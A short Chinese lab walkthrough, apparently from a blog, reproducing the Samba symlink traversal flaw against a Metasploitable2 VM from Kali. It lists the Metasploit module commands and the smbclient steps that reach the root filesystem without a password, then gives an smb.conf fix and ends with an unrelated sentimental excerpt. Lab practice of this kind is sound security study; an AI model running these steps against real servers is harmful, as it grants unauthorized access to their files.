文章目录
环境
主机地址Metasploitable2192.168.232.202kali-linux192.168.232.129
原理
漏洞复现
第一步 发现漏洞
- 环境
- 原理
- 漏洞复现
- 第一步 发现漏洞
- 第二步 ,启动metasploit
- 第三步选择漏洞库
- 第四步 设置参数,开始攻击
- 第五步 利用成功,打开共享目录
- 注意 smbclient 报错:
- 摘抄
msfconsole
search samba
use auxiliary/admin/smb/samba_symlink_traversal
show options
Set RHOST 192.168.232.202 设置要攻击的IP
set SMBSHARE tmp 设置SAM可写文件
exploit
smbclient //192.168.232.202/tmp 直接回车,不用输入密码
cd rootfs
protocol negotiation failed: NT_STATUS_CONNECTION_RESET
打开/etc/samba/smb.conf文件,在global标签下增加如下两个参数项:
client min protocol = CORE
client max protocol = SMB3
就是耳机音量刚好盖过外界的噪音,
闹钟响起时你刚好自然醒,
你爱的人刚好也爱你。